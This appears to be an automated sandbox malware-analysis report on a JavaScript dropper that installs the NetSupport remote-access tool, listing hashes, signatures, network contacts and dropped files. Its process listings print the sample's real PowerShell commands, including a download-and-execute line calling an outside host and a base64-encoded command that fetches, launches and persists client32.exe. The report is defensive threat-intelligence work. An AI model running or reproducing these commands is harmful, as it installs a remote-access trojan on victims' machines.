Malware Analysis Report

2024-10-19 01:40

Sample ID 240207-lh41eafdg6
Target ARS17291729317291729.js
SHA256 2770b332ef571a1462e5a38778307106e16ba66dca58717fe40f6f76259b717b
Tags
netsupport persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2770b332ef571a1462e5a38778307106e16ba66dca58717fe40f6f76259b717b

Threat Level: Known bad

The file ARS17291729317291729.js was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

NetSupport

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Adds Run key to start application

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-07 09:32

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-07 09:32

Reported

2024-02-07 09:35

Platform

win10v2004-20231222-en

Max time kernel

92s

Max time network

140s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js

Signatures

NetSupport

rat netsupport

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\modem_gprs_modules = "C:\\Users\\Admin\\AppData\\Local\\modem_gprs_modules\\client32.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nop -ExeCUtIONPol bYPASS -W hI -eNco QwBoAEQASQByACAAJABlAE4AdgA6AEwATwBDAEEAbABhAHAAcABEAGEAVABhADsAIAAkAEcAMgBmAGYAdwAwAGMAPQBbAGIAeQB0AGUAWwBdAF0AQAAoADgAMAAsACAANwA1ACwAIAAzACwAIAA0ACkAOwAgACQAawBuAHMAUABVADIAQQA9ACcAaAB0AHQAcAA6AC8ALwBzAGEAawBhAGwAZQByAGEAbABvAC4AYwBvAG0ALwBjAGMAZQBhADIANgA4AGIALQA4ADcAMQA2AC0ANAA2AGIAZQAtADkAMQA0ADgALQAzAGUANgAxADQAYgAzADgAYQAwAGQAZgAuAHQAeAB0ACcAOwAgACQAMwBsAEsAYwBVAEgAWAA9ACcAagBHAGgAVAB5AG8AaQBDAC4AegBpAHAAJwA7ACAAJABYAEYAeABiADMAPQAnAG0AbwBkAGUAbQBfAGcAcAByAHMAXwBtAG8AZAB1AGwAZQBzACcAOwAgACQARABFAGYAZgBJAFMAPQBpAE4AVgBPAEsAZQAtAFcAZQBCAHIAZQBxAFUAZQBzAHQAIAAtAFUAcgBJACAAJABrAG4AcwBQAFUAMgBBACAALQBVAHMARQBiAEEAcwBJAEMAUABhAFIAUwBJAE4AZwA7ACAAJABCAG0ASgBOAGcANQBmAD0AJABEAEUAZgBmAEkAUwAuAGMAbwBuAFQAZQBOAHQAOwAgACQATgBUADYAVgBPAEUAPQAkAGUATgB2ADoATABPAEMAQQBsAGEAcABwAEQAYQBUAGEALAAgACQAWABGAHgAYgAzACAALQBqAG8AaQBOACAAJwBcACcAOwAgACQAYwBrAGEAdQA4AD0AIgAkAGUATgB2ADoATABPAEMAQQBsAGEAcABwAEQAYQBUAGEAXAAkADMAbABLAGMAVQBIAFgAIgA7ACAAJABQAHgASQBCAFgAcwBvAEYAPQBbAEMAbwBOAFYARQBSAHQAXQA6ADoAZgByAG8AbQBiAGEAUwBlADYANABTAFQAcgBpAE4ARwAoACQAQgBtAEoATgBnADUAZgApADsAIAAkAEgANQBMAHoAawBIAFQAPQAkAFAAeABJAEIAWABzAG8ARgAgAC0AUwBQAGwASQBUACAAJwAgACcAIAAtAEEAcwAgAFsAQgB5AHQARQBbAF0AXQA7ACAAJAAxAFkASwBnAHMAcwBuAD0AJABHADIAZgBmAHcAMABjACsAJABIADUATAB6AGsASABUADsAIABTAGMAIAAkADMAbABLAGMAVQBIAFgAIAAkADEAWQBLAGcAcwBzAG4AIAAtAEUATgBDAG8AZABpAE4AZwAgAEIAWQBUAGUAOwAgAEUAeABwAEEAbgBkAC0AQQBSAEMAaABJAHYAZQAgAC0AcABBAHQAaAAgACQAYwBrAGEAdQA4ACAALQBkAEUAUwBUAGkAbgBBAFQAaQBvAE4AUABhAHQASAAgACQATgBUADYAVgBPAEUAIAAtAGYAbwBSAEMARQA7ACAAUgBJACAAJAAzAGwASwBjAFUASABYADsAIABDAEQAIAAkAE4AVAA2AFYATwBFADsAIAAkAFIAcQBQAHQAUQBkAD0AIgB7ADAAfQBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACIAIAAtAGYAIAAkAE4AVAA2AFYATwBFADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAATgBlAHcALQBJAFQARQBtAFAAcgBPAFAARQByAHQAeQAgAC0AUABhAFQASAAgACcASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AJwAgAC0ATgBhAE0AZQAgACQAWABGAHgAYgAzACAALQBWAGEATABVAEUAIAAkAFIAcQBQAHQAUQBkACAALQBwAFIAbwBQAGUAcgBUAHkAVABZAFAARQAgACcAUwB0AHIAaQBuAGcAJwA7AA==

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe

"C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 assime.ca udp
CA 67.43.225.106:443 assime.ca tcp
US 8.8.8.8:53 sakaleralo.com udp
DE 192.121.22.184:80 sakaleralo.com tcp
US 8.8.8.8:53 106.225.43.67.in-addr.arpa udp
US 8.8.8.8:53 184.22.121.192.in-addr.arpa udp
IN 13.71.55.58:443 tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 udp
IN 13.71.55.58:443 tcp
IN 13.71.55.58:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
GB 5.61.62.93:443 tcp
US 172.67.68.212:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iisg2x4g.xib.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4080-0-0x0000024BFD510000-0x0000024BFD532000-memory.dmp

memory/4080-12-0x0000024BFB490000-0x0000024BFB4A0000-memory.dmp

memory/4080-11-0x0000024BFB490000-0x0000024BFB4A0000-memory.dmp

memory/4080-10-0x00007FFA49E30000-0x00007FFA4A8F1000-memory.dmp

memory/4776-22-0x00007FFA49E30000-0x00007FFA4A8F1000-memory.dmp

memory/4776-24-0x000001A81CCF0000-0x000001A81CD00000-memory.dmp

memory/4776-23-0x000001A81CCF0000-0x000001A81CD00000-memory.dmp

memory/4776-26-0x000001A81CCF0000-0x000001A81CD00000-memory.dmp

memory/4776-28-0x000001A81CCC0000-0x000001A81CCCA000-memory.dmp

memory/4776-27-0x000001A81CCD0000-0x000001A81CCE2000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe

MD5 a2b46c59f6e7e395d479b09464ecdba0
SHA1 92c132307dd21189b6d7912ddd934b50e50d1ec1
SHA256 89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1
SHA512 4f4479ddcd9d0986aec3d789f9e14f9285e8d9d63a5b8f73c9e3203d3a53cd575b1e15edf0d5f640816bb7f25bd3501244e0f7c181a716a6804742ed2f1cf916

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.dll

MD5 8dd6ae67fced06599dd0643d18395338
SHA1 5972dae148c3ee037c3228d9797ef7bd054229fa
SHA256 74cc09260f7c2bc0e2022ec43eda5648023e02b2bc752a1808e1ef5b0d7695a6
SHA512 a7c5f12fcafaab7d9faa5045c5561465389f1c6e349292fa178d309ee60df00a01b7c7e5c5241373a7174a73700f92ff8fd206e2bc90505e1f49d09bc4dc55ef

C:\Users\Admin\AppData\Local\modem_gprs_modules\msvcr100.dll

MD5 d36e2ebca79a97a3da7ae166355cb058
SHA1 862d93a5b3191efc72537af7a823345180483ca0
SHA256 09629d07055dd129387d8030e47f9f87be142938f7628ee16f3657ff3e7d408e
SHA512 be19f11682a5c47d0bcdfc7163aeb2825d119e797ad80bc2c2ab47a18632e3f833faf9fef3ae18d1410adad9e4f29291284ad0a2cbbe7450b7e81fc5a0264501

C:\Users\Admin\AppData\Local\modem_gprs_modules\HTCTL32.DLL

MD5 8685677d29cd28cd99365daba43bd91b
SHA1 c7f81001c1bffe138bedcb29f8695d0c32da2bcd
SHA256 6424c55ae5589e812f2233c0e579c78cce0a5b4dba9c52bd7d6f17a37575b924
SHA512 653e46604afa00e5594b90a50baab9fa3aefc79c56d5520031bbe423806f05211024b6c549d905a5bddebda5ae94af63bb18fdf759774b491ac5f00f43a1092a

C:\Users\Admin\AppData\Local\modem_gprs_modules\HTCTL32.DLL

MD5 28c8a8263249e68e073b7e07ea790233
SHA1 6229b94354c6a8c5b55607c999a61184e8134c72
SHA256 9479a76792083c185382ff937028d2eb4bb0b8fe7051bc812e8d8c2bd747b5cd
SHA512 ec69ab6c56feeb735661d009576176983911682edc352bb666a6b746641537468d0e4c75ac7371fcf1dd28358d139a8c517692293a17bb492ac8ed3174ebb674

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.ini

MD5 2cd1a8115b7328756129052384e2eed6
SHA1 9458e9553d3d1f075ed09a06fda3f36136781704
SHA256 02ab893e7d31d7c3b18d27c3c4ef6e056da27cc6ad7efa76b8d4729403a067d2
SHA512 df5630c14f1400166ecbf0854a48616c939c0467634c427f8a287edc5c064c0d259b1cec0b02ae7aa31e21d1609ff31f4e11285160323f2c24fcb02de4e20455

C:\Users\Admin\AppData\Local\modem_gprs_modules\NSM.LIC

MD5 866c96ba2823ac5fe70130dfaaa08531
SHA1 892a656da1ea264c73082da8c6e5f5728abcb861
SHA256 6a7c99e4bd767433c25d6df8df81baa99c05dd24fa064e45c306ff4d954e1921
SHA512 0dafc66222bbfcb1558d9845ee4ddeb7a687561b08b86a07b66b120c22952a8082e041d9234d9c69c8ade5d4dae894d3f10afd7ba6dd3f057a08fb5d57c42112

memory/4080-81-0x00007FFA49E30000-0x00007FFA4A8F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 512c6cab650bfda6ef2995f6b515ed6f
SHA1 fec40abf4f5d74ea7f8828cee83770e423203083
SHA256 84871d83ecd410fb4ddede63061d9c521d876d47a8ffdbb8609378447ba0d262
SHA512 638fffef25de1c3e850eb4f4668c4fdafed7bde042b130325daf323b45d2784916381b410219473b5bbacb4c11c6b8b7ab892b3d5695edb0b0a0785233e8e19b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0f6a3762a04bbb03336fb66a040afb97
SHA1 0a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA256 36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512 cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

memory/4776-77-0x00007FFA49E30000-0x00007FFA4A8F1000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\MSVCR100.dll

MD5 4054ad31323fe183a5beff36509e5886
SHA1 bcdc25fffb6e1be98c44e60b33556d5e7bf94747
SHA256 aa3543e079d8cd6dfff32b842e87dc35916b63cab928697205ffa4059fdd2320
SHA512 3a26d685a36c4eedbba4777db883a2331743aaba629104d83b753500e986831cb0153f379207f5aec100f0b8d89a673476d317c874be9d4ea76ad6f9d2408f2a

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICHEK.DLL

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Local\modem_gprs_modules\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.DLL

MD5 7937f859097b360b2cba516cf83ec59f
SHA1 ddc3a3c20ee7c406f312a8e1cbd4a5cbc0a5ee4e
SHA256 228a3ac9a4f0839c1fcd3e6208fe5c610928cac30ad38c1a19ac2af610fe0ca9
SHA512 ff89b4d531e7349eee60a75eedee1be6f2581a108669124c21c4a9a37cefd9dd081a65f3c24651cfae54a29a85b771ca02f162c390c9058ae307744244983115

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-07 09:32

Reported

2024-02-07 09:35

Platform

win7-20231215-en

Max time kernel

117s

Max time network

121s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"

Network

Country Destination Domain Proto
US 8.8.8.8:53 assime.ca udp
CA 67.43.225.106:443 assime.ca tcp
CA 67.43.225.106:443 assime.ca tcp

Files

memory/2852-4-0x000000001B340000-0x000000001B622000-memory.dmp

memory/2852-5-0x0000000002560000-0x0000000002568000-memory.dmp

memory/2852-6-0x000007FEF57C0000-0x000007FEF615D000-memory.dmp

memory/2852-7-0x00000000021E0000-0x0000000002260000-memory.dmp

memory/2852-8-0x000007FEF57C0000-0x000007FEF615D000-memory.dmp

memory/2852-11-0x00000000021E0000-0x0000000002260000-memory.dmp

memory/2852-10-0x00000000021E0000-0x0000000002260000-memory.dmp

memory/2852-9-0x00000000021E0000-0x0000000002260000-memory.dmp

memory/2852-12-0x00000000021E0000-0x0000000002260000-memory.dmp

memory/2852-13-0x00000000021E0000-0x0000000002260000-memory.dmp

memory/2852-14-0x000007FEF57C0000-0x000007FEF615D000-memory.dmp